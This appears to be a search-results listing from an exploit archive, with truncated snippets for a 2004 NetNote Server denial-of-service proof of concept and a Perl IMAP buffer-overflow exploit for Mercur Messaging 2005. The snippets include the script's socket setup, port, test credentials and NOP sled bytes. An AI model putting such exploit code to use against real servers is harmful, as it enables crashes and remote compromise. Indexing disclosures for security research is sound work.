4 matches found
NetNote Server <= 2.2 build 230 - Crafted String DoS Exploit
No description provided by source. / NetNote Server v2.2 build 230, crafted string vulnerability. Poc included crash the server. Full disclosure and poc exploit by class101 at DFind.kd-team.com & n3ws at EFnet 13 november 2004 ------------------ WHAT IS NETNOTE ------------------ Homepage -...
Mercur Messaging 2005 - IMAP Remote Buffer Overflow
Mercur Messaging 2005 - IMAP Remote Buffer Overflow !/bin/perl tested on win2k server SP4 English ATTENTION! If you have an another valid account you must change the offsets this is only a poc use IO::Socket::INET; my $host = shift@ARGV; my $port = 143; my $reply; my $request; my $user = "test"; ...
Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ========================================================= Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit ========================================================= !/bin/perl tested on win2k server SP4 English ATTENTION! If you ha...
Mercur Messaging 2005 - IMAP Remote Buffer Overflow
!/bin/perl tested on win2k server SP4 English ATTENTION! If you have an another valid account you must change the offsets this is only a poc use IO::Socket::INET; my $host = shift@ARGV; my $port = 143; my $reply; my $request; my $user = "test"; my $pass = "test"; my $nop = "\x90"x8; my $nop1 =...